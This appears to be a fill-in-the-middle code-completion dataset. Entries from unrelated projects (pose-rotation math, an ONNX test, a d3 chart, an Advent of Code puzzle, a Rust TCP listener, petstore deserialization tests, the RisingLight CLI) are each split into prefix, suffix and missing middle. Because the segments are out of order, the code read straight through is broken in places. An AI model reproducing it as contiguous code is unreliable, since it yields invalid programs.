sellect_joints = np.array([1,2,4,5,16,17,18,19],dtype=np.int)-1
results = [torch.eye(3,3)[None].cuda().repeat(batch_size,1,1)]
for i_val in range(param_num-1): | glob_transf_mat = torch.matmul(results[parent], joint_rot)
results.append(glob_transf_mat)
global_rotmat = torch.stack(results, axis=1)[:, sellect_joints].contiguous()
return global_rotmat
def _calc_joint_angle_error(pred_mat, gt_mat, return_axis_angle=False):
"""
Compute the geodesic distance between the two input matrices.
 :param pred_mat: predicted rotation matrices. Shape: (Seq, 9, 3, 3)
:param gt_mat: ground truth rotation matrices. Shape: ( Seq, 9, 3, 3)
:return: Mean geodesic distance between input matrices.
"""
# Reshape the matrices into B x 3 x 3 arrays
r1 = pred_mat.reshape(-1,3,3)
r2 = gt_mat.reshape(-1,3,3)
# Transpose gt matrices
r2t = r2.permute(0,2,1)
r = torch.matmul(r1, r2t)
# Convert rotation matrix to axis angle representation and find the angle
axis_angles = rotation_matrix_to_angle_axis(r)
angles = torch.norm(axis_angles, dim=-1)*(180./np.pi)
if return_axis_angle:
return angles,axis_angles
return angles | #i_val = int(idx + 1)
joint_rot = pose_rotmat[:, i_val]
parent = constants.kintree_parents[i_val+1] |
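A self-contained sketch (plain numpy, outside the project's torch pipeline) of the geodesic angle that _calc_joint_angle_error measures, using the equivalent trace identity angle = arccos((trace(R1 R2^T) - 1) / 2):
import numpy as np

def geodesic_angle_deg(r1, r2):
    # clip guards against values just outside [-1, 1] from floating-point error
    cos_angle = (np.trace(r1 @ r2.T) - 1.0) / 2.0
    return np.degrees(np.arccos(np.clip(cos_angle, -1.0, 1.0)))

rot_z_90 = np.array([[0.0, -1.0, 0.0],
                     [1.0,  0.0, 0.0],
                     [0.0,  0.0, 1.0]])  # 90 degree rotation about z
print(geodesic_angle_deg(np.eye(3), rot_z_90))  # 90.0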
test_convert_to_onnx.py | import logging
import pytest
import os
from functional_tests.t_utils import remove_tmp_dir, create_tmp_dir, __data_testing_dir__
from ivadomed.scripts import convert_to_onnx
from ivadomed.utils import ArgParseException
logger = logging.getLogger(__name__)
__model_path__ = os.path.join(__data_testing_dir__, 'spinegeneric_model.pt')
def setup_function():
create_tmp_dir()
def test_convert_to_onnx():
convert_to_onnx.main(args=['-m', f'{__model_path__}', '-d', '2'])
assert os.path.exists(os.path.join(__data_testing_dir__, 'spinegeneric_model.onnx'))
def test_convert_to_onnx_no_model():
with pytest.raises(ArgParseException, match=r"Error parsing args"):
convert_to_onnx.main(args=['-d', '2'])
def test_convert_to_onnx_no_dimension():
with pytest.raises(ArgParseException, match=r"Error parsing args"):
convert_to_onnx.main(args=['-m', f'{__model_path__}'])
def teardown_function():
remove_tmp_dir() | ||
app.js | const data = [
{date: 1988, num: 51}, {date: 1989, num: 60},
{date: 1990, num: 62}, {date: 1991, num: -64},
{date: 1992, num: 69}, {date: 1993, num: 69},
{date: 1994, num: 75}, {date: 1995, num: 80},
{date: 1996, num: 91}, {date: 1997, num: 93},
{date: 1998, num: 97}, {date: 1999, num: 100},
{date: 2000, num: -103}, {date: 2001, num: 104},
{date: 2002, num: 105}, {date: 2003, num: 110},
{date: 2004, num: 111}, {date: 2005, num: 112},
{date: 2006, num: 112}, {date: 2007, num: 113},
{date: 2008, num: 119}, {date: 2009, num: 128},
{date: 2010, num: 139}, {date: 2011, num: -139},
{date: 2012, num: 139}, {date: 2013, num: 140},
{date: 2014, num: 143}, {date: 2015, num: 146},
{date: 2016, num: 147}, {date: 2017, num: 149}
];
const timeParse = d3.timeParse('%Y');
const timeFormat = d3.timeFormat('%Y');
const chartWidth = 1000;
const chartHeight = 800;
const padding = 50;
data.forEach((e, i) => data[i].date = timeParse(e.date));
const xScale = d3.scaleTime()
.domain([d3.min(data, d => d.date), d3.max(data, d => d.date)])
.range([padding, chartWidth - padding]);
const yScale = d3.scaleLinear()
.domain([0, d3.max(data, d => d.num)])
.range([chartHeight - padding, padding]);
const svg = d3.select('#chart')
.append('svg')
.attr('width', chartWidth)
.attr('height', chartHeight);
const xAxis = d3.axisBottom(xScale)
.ticks(10)
| .ticks(12);
svg.append('g')
.attr('transform', 'translate(0,' + (chartHeight - padding) + ')')
.call(xAxis);
svg.append('g')
.attr('transform', 'translate(' + padding + ',0)')
.call(yAxis);
let line = d3.line()
.defined(d => d.num >= 0)
.x(d => xScale(d.date))
.y(d => yScale(d.num));
svg.append('path')
.datum(data)
.attr('fill', 'none')
.attr('stroke', '#73FF36')
.attr('stroke-width', 5)
.attr('d', line); | .tickFormat(timeFormat);
const yAxis = d3.axisLeft(yScale)
|
8.py | with open('input.txt') as f:
img_data = f.readline().strip()
img_w = 25
img_h = 6
layer_num_pixels = img_w * img_h
img_num_layers = len(img_data) // layer_num_pixels
print("img_num_layers = %d" % img_num_layers)
layer_data = []
for i in range(img_num_layers):
a, b = layer_num_pixels*i, layer_num_pixels*(i+1)
layer_data.append(img_data[a:b])
def _layer_count_digits(data, digit):
result = 0
for i in range(len(data)):
if data[i] == digit: result += 1
return result
def layer_count_zeros(data):
return _layer_count_digits(data, "0")
def | (data):
return _layer_count_digits(data, "1")
def layer_count_twos(data):
return _layer_count_digits(data, "2")
min_zeros_index, min_zeros_count = -1, 0
for i in range(len(layer_data)):
zeros_count = layer_count_zeros(layer_data[i])
if min_zeros_index == -1: min_zeros_index, min_zeros_count = i, zeros_count
elif zeros_count < min_zeros_count: min_zeros_index, min_zeros_count = i, zeros_count
print("min_zeros_index = %d" % min_zeros_index)
print("min_zeros_count = %d" % min_zeros_count)
ones_count = layer_count_ones(layer_data[min_zeros_index])
twos_count = layer_count_twos(layer_data[min_zeros_index])
print("ones_count * twos_count = %d * %d = %d" % (ones_count, twos_count, ones_count * twos_count))
render_data = []
for y in range(img_h):
for x in range(img_w):
t = y * img_w + x
pixel_color = "2"
for z in range(img_num_layers):
if layer_data[z][t] != "2":
pixel_color = layer_data[z][t]
break
render_data.append(pixel_color)
z = 0
for y in range(img_h):
for x in range(img_w):
pixel_color = render_data[z]
if pixel_color == "0": pixel_color = " "
print(pixel_color, end='')
z += 1
print("")
| layer_count_ones |
user.js | import mongoose from 'mongoose'
import {USER_ROLES, USER_STATUS} from '../utils/constants'
const schema = mongoose.Schema(
{
email: String,
address: String, | password: String,
role: {
type: String,
enum: Object.values(USER_ROLES),
default: USER_ROLES.BIDDER
},
status: {
type: String,
enum: Object.values(USER_STATUS),
default: USER_STATUS.NOT_VERIFIED
},
refreshToken: String
},
{timestamps: {createdAt: 'createdAt', updatedAt: 'updatedAt'}}
)
export default mongoose.model('User', schema) | fullName: String, |
tcp_listener_accpet.rs | use std::io;
use std::net::SocketAddr;
use std::os::windows::io::AsRawSocket;
use super::super::{add_socket, co_io_result, EventData};
use crate::coroutine_impl::{co_cancel_data, CoroutineImpl, EventSource};
use crate::io::cancel::CancelIoData;
use crate::io::OptionCell;
use crate::net::{TcpListener, TcpStream};
use crate::scheduler::get_scheduler;
use crate::sync::delay_drop::DelayDrop;
use miow::net::{AcceptAddrsBuf, TcpListenerExt};
use winapi::shared::ntdef::*;
pub struct TcpListenerAccept<'a> {
io_data: EventData,
socket: &'a ::std::net::TcpListener,
ret: OptionCell<::std::net::TcpStream>,
addr: AcceptAddrsBuf,
can_drop: DelayDrop,
}
impl<'a> TcpListenerAccept<'a> {
pub fn new(socket: &'a TcpListener) -> io::Result<Self> {
use socket2::{Domain, Socket, Type}; | SocketAddr::V4(..) => Socket::new(Domain::IPV4, Type::STREAM, None)?,
SocketAddr::V6(..) => Socket::new(Domain::IPV6, Type::STREAM, None)?,
};
let stream = stream.into();
Ok(TcpListenerAccept {
io_data: EventData::new(socket.as_raw_socket() as HANDLE),
socket: socket.inner(),
ret: OptionCell::new(stream),
addr: AcceptAddrsBuf::new(),
can_drop: DelayDrop::new(),
})
}
pub fn done(&mut self) -> io::Result<(TcpStream, SocketAddr)> {
co_io_result(&self.io_data)?;
let socket = &self.socket;
let ss = self.ret.take();
let s = socket.accept_complete(&ss).and_then(|_| {
ss.set_nonblocking(true)?;
add_socket(&ss).map(|io| TcpStream::from_stream(ss, io))
})?;
let addr = self.addr.parse(&self.socket).and_then(|a| {
a.remote().ok_or_else(|| {
io::Error::new(io::ErrorKind::Other, "could not obtain remote address")
})
})?;
Ok((s, addr))
}
}
impl<'a> EventSource for TcpListenerAccept<'a> {
fn subscribe(&mut self, co: CoroutineImpl) {
let _g = self.can_drop.delay_drop();
let s = get_scheduler();
let cancel = co_cancel_data(&co);
// we don't need to register the timeout here,
// prepare the co first
self.io_data.co = Some(co);
// call the overlapped read API
co_try!(s, self.io_data.co.take().expect("can't get co"), unsafe {
self.socket
.accept_overlapped(&*self.ret, &mut self.addr, self.io_data.get_overlapped())
});
// register the cancel io data
cancel.set_io(CancelIoData::new(&self.io_data));
// re-check the cancel status
if cancel.is_canceled() {
unsafe { cancel.cancel() };
}
}
} |
let local_addr = socket.local_addr()?;
let stream = match local_addr { |
mod.rs | //! A collection of codecs that can be used to transform between bytes streams /
//! byte messages, byte frames and structured events.
#![deny(missing_docs)]
mod decoder;
mod encoder; |
pub use decoder::{Decoder, DecodingConfig};
pub use encoder::Encoder;
pub use ready_frames::ReadyFrames; | mod ready_frames; |
no-link.rs | // Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// aux-build:empty-struct.rs
#[no_link]
extern crate empty_struct;
//~^ WARN proc macro crates and `#[no_link]` crates have no effect without `#[macro_use]`
fn main() | {
empty_struct::XEmpty1; //~ ERROR cannot find value `XEmpty1` in module `empty_struct`
} |
|
objstaticmethod.rs | use super::objtype::PyClassRef;
use crate::function::OptionalArg;
use crate::pyobject::{PyClassImpl, PyContext, PyObjectRef, PyRef, PyResult, PyValue};
use crate::slots::SlotDescriptor;
use crate::vm::VirtualMachine;
#[pyclass(name = "staticmethod")]
#[derive(Clone, Debug)]
pub struct PyStaticMethod {
pub callable: PyObjectRef,
}
pub type PyStaticMethodRef = PyRef<PyStaticMethod>;
impl PyValue for PyStaticMethod {
fn class(vm: &VirtualMachine) -> PyClassRef {
vm.ctx.staticmethod_type()
}
}
impl SlotDescriptor for PyStaticMethod {
fn descr_get(
vm: &VirtualMachine,
zelf: PyObjectRef,
_obj: Option<PyObjectRef>,
_cls: OptionalArg<PyObjectRef>,
) -> PyResult {
let zelf = Self::_zelf(zelf, vm)?;
Ok(zelf.callable.clone())
}
}
#[pyimpl(with(SlotDescriptor), flags(BASETYPE))]
impl PyStaticMethod {
pub fn | (callable: PyObjectRef) -> Self {
Self { callable }
}
#[pyslot]
fn tp_new(
cls: PyClassRef,
callable: PyObjectRef,
vm: &VirtualMachine,
) -> PyResult<PyStaticMethodRef> {
PyStaticMethod {
callable: callable.clone(),
}
.into_ref_with_type(vm, cls)
}
}
pub fn init(context: &PyContext) {
PyStaticMethod::extend_class(context, &context.types.staticmethod_type);
}
| new |
AllJobs.tsx | import React, {
ComponentPropsWithoutRef,
FunctionComponent,
useCallback,
useContext,
useEffect,
useMemo,
useState
} from 'react';
import Helmet from 'react-helmet';
import { useSnackbar } from 'notistack';
import useFetch from 'use-http-2';
import { reduce } from 'lodash';
import TeamsContext from '../../contexts/Teams';
import useActions from '../../hooks/useActions';
import useBatchActions from '../../hooks/useBatchActions';
import ClusterContext from './ClusterContext';
import JobsTable from './JobsTable';
import {
user,
status,
type,
gpu,
preemptible,
priority,
submitted,
finished,
useNameId,
} from './JobsTable/columns';
import { groupByActiveStatus } from './utils';
|
const ActiveJobsTable: FunctionComponent<JobsTablePropsWithoutColumnsActions> = (props) => {
const { cluster } = useContext(ClusterContext);
const { support, approve, pause, resume, kill } = useActions(cluster.id);
const { batchApprove, batchPause, batchResume, batchKill } = useBatchActions(cluster.id);
const nameId = useNameId();
const columns = useMemo(() => [
nameId,
user(),
status(),
type(),
gpu(),
preemptible(),
priority(),
submitted(),
], [nameId]);
const actions = useMemo(() => {
if (cluster.admin) {
return [
support, approve, pause, resume, kill,
batchApprove, batchPause, batchResume, batchKill
];
} else {
return [support];
}
}, [
cluster.admin,
support, approve, pause, resume, kill,
batchApprove, batchPause, batchResume, batchKill
]);
return (
<JobsTable
columns={columns}
actions={actions}
{...props}
/>
);
};
const InactiveJobsTable: FunctionComponent<JobsTablePropsWithoutColumnsActions> = (props) => {
const { cluster } = useContext(ClusterContext);
const { support } = useActions(cluster.id);
const nameId = useNameId();
const columns = useMemo(() => [
nameId,
user(),
status(),
type(),
gpu(),
preemptible(),
priority(),
finished(),
], [nameId]);
const actions = useMemo(() => [support], [support]);
return (
<JobsTable
columns={columns}
actions={actions}
{...props}
/>
);
};
const AllJobs: FunctionComponent = () => {
const { enqueueSnackbar, closeSnackbar } = useSnackbar();
const { cluster } = useContext(ClusterContext);
const { selectedTeam } = useContext(TeamsContext);
const [limit, setLimit] = useState(30);
const { data, loading, error, get, abort } = useFetch(
`/api/v2/clusters/${cluster.id}/teams/${selectedTeam}/jobs?user=all&limit=${limit}`,
undefined,
[cluster.id, selectedTeam, limit]
);
const { Inactive: inactiveJobs=[], ...activeStatusesJobs } = useMemo(() => {
if (data === undefined) return {};
return groupByActiveStatus(data);
}, [data]);
const handleLastPage = useCallback((pageSize: number) => {
abort();
setLimit((limit) => Math.ceil((limit + pageSize) / pageSize) * pageSize);
}, [abort, setLimit]);
const title = useMemo(() => {
if (data === undefined) return cluster.id;
const length = reduce(activeStatusesJobs, (length, jobs) => length + jobs.length, 0)
return `(${length}) ${cluster.id}`;
}, [data, activeStatusesJobs, cluster]);
useEffect(() => {
if (loading === false) {
const timeout = setTimeout(get, 3000);
return () => {
clearTimeout(timeout);
}
}
}, [loading, get]);
useEffect(() => {
if (error !== undefined) {
const key = enqueueSnackbar(`Failed to fetch jobs from cluster: ${cluster.id}`, {
variant: 'error',
persist: true
});
return () => {
if (key !== null) closeSnackbar(key);
}
}
}, [error, enqueueSnackbar, closeSnackbar, cluster.id]);
return (
<>
{ title && <Helmet title={title}/> }
{ [ 'Running', 'Pending', 'Unapproved', 'Paused' ].map(
status => activeStatusesJobs[status] && (
<ActiveJobsTable
key={status}
title={`${status} Jobs`}
jobs={activeStatusesJobs[status]}
defaultPageSize={5}
selection
/>
)
) }
<InactiveJobsTable
title="Inactive Jobs"
jobs={inactiveJobs}
isLoading={data === undefined}
defaultPageSize={10}
onLastPage={handleLastPage}
/>
</>
);
};
export default AllJobs; | type JobsTablePropsWithoutColumnsActions = Omit<ComponentPropsWithoutRef<typeof JobsTable>, 'columns' | 'actions'> |
test_deserialization.py | # coding: utf-8
# flake8: noqa
"""
Run the tests.
$ pip install nose (optional)
$ cd OpenAPIPetstore-python
$ nosetests -v
"""
from collections import namedtuple
import json
import os
import time
import unittest
import datetime
import six
import petstore_api
from petstore_api.exceptions import (
ApiTypeError,
ApiKeyError,
ApiValueError,
)
from petstore_api.model import (
enum_test,
pet,
animal,
dog,
parent_pet,
child_lizard,
category,
outer_enum,
outer_number,
string_boolean_map,
)
from petstore_api.model_utils import (
file_type,
int,
model_to_dict,
str,
)
from petstore_api.rest import RESTResponse
MockResponse = namedtuple('MockResponse', 'data')
class DeserializationTests(unittest.TestCase):
def setUp(self):
self.api_client = petstore_api.ApiClient()
self.deserialize = self.api_client.deserialize
def test_enum_test(self):
""" deserialize dict(str, Enum_Test) """
data = {
'enum_test': {
"enum_string": "UPPER",
"enum_string_required": "lower",
"enum_integer": 1,
"enum_number": 1.1,
"outerEnum": "placed"
}
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response,
({str: (enum_test.EnumTest,)},), True)
self.assertTrue(isinstance(deserialized, dict))
self.assertTrue(
isinstance(deserialized['enum_test'], enum_test.EnumTest))
value = (
outer_enum.OuterEnum.allowed_values[('value',)]["PLACED"])
outer_enum_val = outer_enum.OuterEnum(value)
sample_instance = enum_test.EnumTest(
enum_string="UPPER",
enum_string_required="lower",
enum_integer=1,
enum_number=1.1,
outer_enum=outer_enum_val
)
self.assertEqual(deserialized['enum_test'], sample_instance)
def test_deserialize_dict_str_pet(self):
""" deserialize dict(str, Pet) """
data = {
'pet': {
"id": 0,
"category": {
"id": 0,
"name": "string"
},
"name": "doggie",
"photoUrls": [
"string"
],
"tags": [
{
"id": 0,
"fullName": "string"
}
],
"status": "available"
}
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response,
({str: (pet.Pet,)},), True)
self.assertTrue(isinstance(deserialized, dict))
self.assertTrue(isinstance(deserialized['pet'], pet.Pet))
def test_deserialize_dict_str_dog(self):
""" deserialize dict(str, Dog), use discriminator"""
data = {
'dog': {
"className": "Dog",
"color": "white",
"breed": "Jack Russel Terrier"
}
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response,
({str: (animal.Animal,)},), True)
self.assertTrue(isinstance(deserialized, dict))
dog_inst = deserialized['dog']
self.assertTrue(isinstance(dog_inst, dog.Dog))
self.assertEqual(dog_inst.class_name, "Dog")
self.assertEqual(dog_inst.color, "white")
self.assertEqual(dog_inst.breed, "Jack Russel Terrier")
def test_deserialize_lizard(self):
""" deserialize ChildLizard, use discriminator"""
data = {
"pet_type": "ChildLizard",
"lovesRocks": True
}
response = MockResponse(data=json.dumps(data))
lizard = self.deserialize(response,
(parent_pet.ParentPet,), True)
self.assertTrue(isinstance(lizard, child_lizard.ChildLizard))
self.assertEqual(lizard.pet_type, "ChildLizard")
self.assertEqual(lizard.loves_rocks, True)
def test_deserialize_dict_str_int(self):
""" deserialize dict(str, int) """
data = {
'integer': 1
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, ({str: (int,)},), True)
self.assertTrue(isinstance(deserialized, dict))
self.assertTrue(isinstance(deserialized['integer'], int))
def test_deserialize_str(self):
""" deserialize str """
data = "test str"
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, (str,), True)
self.assertTrue(isinstance(deserialized, str))
def test_deserialize_date(self):
""" deserialize date """
data = "1997-07-16"
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, (datetime.date,), True)
self.assertTrue(isinstance(deserialized, datetime.date))
def test_deserialize_datetime(self):
""" deserialize datetime """
data = "1997-07-16T19:20:30.45+01:00"
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, (datetime.datetime,), True)
self.assertTrue(isinstance(deserialized, datetime.datetime))
def test_deserialize_pet(self):
|
def test_deserialize_list_of_pet(self):
""" deserialize list[Pet] """
data = [
{
"id": 0,
"category": {
"id": 0,
"name": "string"
},
"name": "doggie0",
"photoUrls": [
"string"
],
"tags": [
{
"id": 0,
"fullName": "string"
}
],
"status": "available"
},
{
"id": 1,
"category": {
"id": 0,
"name": "string"
},
"name": "doggie1",
"photoUrls": [
"string"
],
"tags": [
{
"id": 0,
"fullName": "string"
}
],
"status": "available"
}]
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response,
([pet.Pet],), True)
self.assertTrue(isinstance(deserialized, list))
self.assertTrue(isinstance(deserialized[0], pet.Pet))
self.assertEqual(deserialized[0].id, 0)
self.assertEqual(deserialized[1].id, 1)
self.assertEqual(deserialized[0].name, "doggie0")
self.assertEqual(deserialized[1].name, "doggie1")
def test_deserialize_nested_dict(self):
""" deserialize dict(str, dict(str, int)) """
data = {
"foo": {
"bar": 1
}
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response,
({str: ({str: (int,)},)},), True)
self.assertTrue(isinstance(deserialized, dict))
self.assertTrue(isinstance(deserialized["foo"], dict))
self.assertTrue(isinstance(deserialized["foo"]["bar"], int))
def test_deserialize_nested_list(self):
""" deserialize list[list[str]] """
data = [["foo"]]
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, ([[str]],), True)
self.assertTrue(isinstance(deserialized, list))
self.assertTrue(isinstance(deserialized[0], list))
self.assertTrue(isinstance(deserialized[0][0], str))
def test_deserialize_none(self):
""" deserialize None """
response = MockResponse(data=json.dumps(None))
error_msg = (
"Invalid type for variable 'received_data'. Required value type is "
"datetime and passed type was NoneType at ['received_data']"
)
with self.assertRaises(ApiTypeError) as exc:
deserialized = self.deserialize(response, (datetime.datetime,), True)
self.assertEqual(str(exc.exception), error_msg)
def test_deserialize_OuterEnum(self):
""" deserialize OuterEnum """
# make sure that an exception is thrown on an invalid value
with self.assertRaises(ApiValueError):
self.deserialize(
MockResponse(data=json.dumps("test str")),
(outer_enum.OuterEnum,),
True
)
# valid value works
placed_str = (
outer_enum.OuterEnum.allowed_values[('value',)]["PLACED"]
)
response = MockResponse(data=json.dumps(placed_str))
deserialized = self.deserialize(response,
(outer_enum.OuterEnum,), True)
self.assertTrue(isinstance(deserialized, outer_enum.OuterEnum))
self.assertTrue(deserialized.value == placed_str)
def test_deserialize_OuterNumber(self):
""" deserialize OuterNumber """
# make sure that an exception is thrown on an invalid type value
with self.assertRaises(ApiTypeError):
deserialized = self.deserialize(
MockResponse(data=json.dumps("test str")),
(outer_number.OuterNumber,),
True
)
# make sure that an exception is thrown on an invalid value
with self.assertRaises(ApiValueError):
deserialized = self.deserialize(
MockResponse(data=json.dumps(21.0)),
(outer_number.OuterNumber,),
True
)
# valid value works
number_val = 11.0
response = MockResponse(data=json.dumps(number_val))
number = self.deserialize(response,
(outer_number.OuterNumber,), True)
self.assertTrue(isinstance(number, outer_number.OuterNumber))
self.assertTrue(number.value == number_val)
def test_deserialize_file(self):
"""Ensures that file deserialization works"""
response_types_mixed = (file_type,)
# sample from http://www.jtricks.com/download-text
HTTPResponse = namedtuple(
'urllib3_response_HTTPResponse',
['status', 'reason', 'data', 'getheaders', 'getheader']
)
headers = {'Content-Disposition': 'attachment; filename=content.txt'}
def get_headers():
return headers
def get_header(name, default=None):
return headers.get(name, default)
file_data = (
"You are reading text file that was supposed to be downloaded\r\n"
"to your hard disk. If your browser offered to save you the file,"
"\r\nthen it handled the Content-Disposition header correctly."
)
http_response = HTTPResponse(
status=200,
reason='OK',
data=file_data,
getheaders=get_headers,
getheader=get_header
)
# response which is deserialized to a file
mock_response = RESTResponse(http_response)
file_path = None
try:
file_object = self.deserialize(
mock_response, response_types_mixed, True)
self.assertTrue(isinstance(file_object, file_type))
file_path = file_object.name
self.assertFalse(file_object.closed)
file_object.close()
if six.PY3:
file_data = file_data.encode('utf-8')
with open(file_path, 'rb') as other_file_object:
self.assertEqual(other_file_object.read(), file_data)
finally:
os.unlink(file_path)
def test_deserialize_binary_to_str(self):
"""Ensures that bytes deserialization works"""
response_types_mixed = (str,)
# sample from http://www.jtricks.com/download-text
HTTPResponse = namedtuple(
'urllib3_response_HTTPResponse',
['status', 'reason', 'data', 'getheaders', 'getheader']
)
headers = {}
def get_headers():
return headers
def get_header(name, default=None):
return headers.get(name, default)
data = "str"
http_response = HTTPResponse(
status=200,
reason='OK',
data=json.dumps(data).encode("utf-8") if six.PY3 else json.dumps(data),
getheaders=get_headers,
getheader=get_header
)
mock_response = RESTResponse(http_response)
result = self.deserialize(mock_response, response_types_mixed, True)
self.assertEqual(isinstance(result, str), True)
self.assertEqual(result, data)
def test_deserialize_string_boolean_map(self):
"""
Ensures that string boolean (additional properties)
deserialization works
"""
# make sure that an exception is thrown on an invalid type
with self.assertRaises(ApiTypeError):
deserialized = self.deserialize(
MockResponse(data=json.dumps("test str")),
(string_boolean_map.StringBooleanMap,),
True
)
# valid value works
item_val = {'some_key': True}
response = MockResponse(data=json.dumps(item_val))
model = string_boolean_map.StringBooleanMap(**item_val)
deserialized = self.deserialize(response,
(string_boolean_map.StringBooleanMap,), True)
self.assertTrue(isinstance(deserialized, string_boolean_map.StringBooleanMap))
self.assertTrue(deserialized['some_key'] == True)
self.assertTrue(deserialized == model)
| """ deserialize pet """
data = {
"id": 0,
"category": {
"id": 0,
"name": "string"
},
"name": "doggie",
"photoUrls": [
"string"
],
"tags": [
{
"id": 0,
"fullName": "string"
}
],
"status": "available"
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, (pet.Pet,), True)
self.assertTrue(isinstance(deserialized, pet.Pet))
self.assertEqual(deserialized.id, 0)
self.assertEqual(deserialized.name, "doggie")
self.assertTrue(isinstance(deserialized.category, category.Category))
self.assertEqual(deserialized.category.name, "string")
self.assertTrue(isinstance(deserialized.tags, list))
self.assertEqual(deserialized.tags[0].full_name, "string") |
main.rs | // Copyright 2022 RisingLight Project Authors. Licensed under Apache-2.0.
//! A simple interactive shell of the database.
use std::fs::File;
use std::sync::Mutex;
use anyhow::{anyhow, Result};
use clap::Parser;
use risinglight::array::{datachunk_to_sqllogictest_string, DataChunk};
use risinglight::storage::SecondaryStorageOptions;
use risinglight::Database;
use rustyline::error::ReadlineError;
use rustyline::Editor;
use tracing::{info, warn, Level};
use tracing_subscriber::prelude::*;
/// RisingLight: an OLAP database system.
#[derive(Parser, Debug)]
#[clap(author, version, about, long_about = None)]
struct Args {
/// File to execute. Can be either a SQL `sql` file or sqllogictest `slt` file.
#[clap(short, long)]
file: Option<String>,
/// Whether to use in-memory engine
#[clap(long)]
memory: bool,
/// Control the output format
/// - `text`: plain text
/// - `human`: human readable format
#[clap(long)]
output_format: Option<String>,
}
// Print a chunk in the requested output format (human-readable by default)
fn print_chunk(chunk: &DataChunk, output_format: &Option<String>) {
let output_format = output_format.as_ref().map(|x| x.as_str());
match output_format {
Some("human") | None => match chunk.header() {
Some(header) => match header[0].as_str() {
"$insert.row_counts" => {
println!("{} rows inserted", chunk.array_at(0).get_to_string(0))
}
"$delete.row_counts" => {
println!("{} rows deleted", chunk.array_at(0).get_to_string(0))
}
"$create" => println!("created"),
"$drop" => println!("dropped"),
"$explain" => println!("{}", chunk.array_at(0).get_to_string(0)),
_ => println!("{}", chunk),
},
None => println!("{}", chunk),
},
Some("text") => println!("{}", datachunk_to_sqllogictest_string(chunk)),
Some(format) => panic!("unsupported output format: {}", format),
}
}
/// Run RisingLight interactive mode
async fn interactive(db: Database, output_format: Option<String>) -> Result<()> {
let mut rl = Editor::<()>::new();
let history_path = dirs::cache_dir().map(|p| {
let cache_dir = p.join("risinglight");
std::fs::create_dir_all(cache_dir.as_path()).ok();
let history_path = cache_dir.join("history.txt");
if !history_path.as_path().exists() {
File::create(history_path.as_path()).ok();
}
history_path.into_boxed_path()
});
if let Some(ref history_path) = history_path {
if let Err(err) = rl.load_history(&history_path) {
println!("No previous history. {err}");
}
}
loop {
let readline = rl.readline("> ");
match readline {
Ok(line) => {
rl.add_history_entry(line.as_str());
let ret = db.run(&line).await;
match ret {
Ok(chunks) => {
for chunk in chunks {
print_chunk(&chunk, &output_format);
}
}
Err(err) => println!("{}", err),
}
}
Err(ReadlineError::Interrupted) => {
println!("Interrupted");
}
Err(ReadlineError::Eof) => {
println!("Exited");
break;
}
Err(err) => {
println!("Error: {:?}", err);
break;
}
}
}
if let Some(ref history_path) = history_path {
if let Err(err) = rl.save_history(&history_path) {
println!("Save history failed, {err}");
}
}
Ok(())
}
/// Run a SQL file in RisingLight
async fn | (db: Database, path: &str, output_format: Option<String>) -> Result<()> {
let lines = std::fs::read_to_string(path)?;
info!("{}", lines);
let chunks = db.run(&lines).await?;
for chunk in chunks {
print_chunk(&chunk, &output_format);
}
Ok(())
}
/// Wrapper for sqllogictest
struct DatabaseWrapper {
tx: tokio::sync::mpsc::Sender<String>,
rx: Mutex<tokio::sync::mpsc::Receiver<Result<Vec<DataChunk>, risinglight::Error>>>,
output_format: Option<String>,
}
impl sqllogictest::DB for DatabaseWrapper {
type Error = risinglight::Error;
fn run(&self, sql: &str) -> Result<String, Self::Error> {
info!("{}", sql);
self.tx.blocking_send(sql.to_string()).unwrap();
let chunks = self.rx.lock().unwrap().blocking_recv().unwrap()?;
for chunk in &chunks {
print_chunk(chunk, &self.output_format);
}
let output = chunks
.iter()
.map(datachunk_to_sqllogictest_string)
.collect();
Ok(output)
}
}
/// Run a sqllogictest file in RisingLight
async fn run_sqllogictest(db: Database, path: &str, output_format: Option<String>) -> Result<()> {
let (ttx, mut trx) = tokio::sync::mpsc::channel(1);
let (dtx, drx) = tokio::sync::mpsc::channel(1);
let mut tester = sqllogictest::Runner::new(DatabaseWrapper {
tx: ttx,
rx: Mutex::new(drx),
output_format,
});
let handle = tokio::spawn(async move {
while let Some(sql) = trx.recv().await {
dtx.send(db.run(&sql).await).await.unwrap();
}
});
let path = path.to_string();
let sqllogictest_handler = tokio::task::spawn_blocking(move || {
// `ParseError` isn't Send, so we cannot directly use it as anyhow Error.
tester.run_file(path).map_err(|err| anyhow!("{:?}", err))?;
Ok::<_, anyhow::Error>(())
});
sqllogictest_handler.await.unwrap().unwrap();
handle.await.unwrap();
Ok(())
}
#[tokio::main]
async fn main() -> Result<()> {
let args = Args::parse();
let fmt_layer = tracing_subscriber::fmt::layer().compact();
let filter_layer =
tracing_subscriber::EnvFilter::from_default_env().add_directive(Level::INFO.into());
tracing_subscriber::registry()
.with(filter_layer)
.with(fmt_layer)
.init();
let db = if args.memory {
info!("using memory engine");
Database::new_in_memory()
} else {
info!("using Secondary engine");
Database::new_on_disk(SecondaryStorageOptions::default_for_cli()).await
};
if let Some(file) = args.file {
if file.ends_with(".sql") {
run_sql(db, &file, args.output_format).await?;
} else if file.ends_with(".slt") {
run_sqllogictest(db, &file, args.output_format).await?;
} else {
warn!("No suffix detected, assume sql file");
run_sql(db, &file, args.output_format).await?;
}
} else {
interactive(db, args.output_format).await?;
}
Ok(())
}
| run_sql |
saltutil.py | # -*- coding: utf-8 -*-
'''
The Saltutil runner is used to sync custom types to the Master. See the
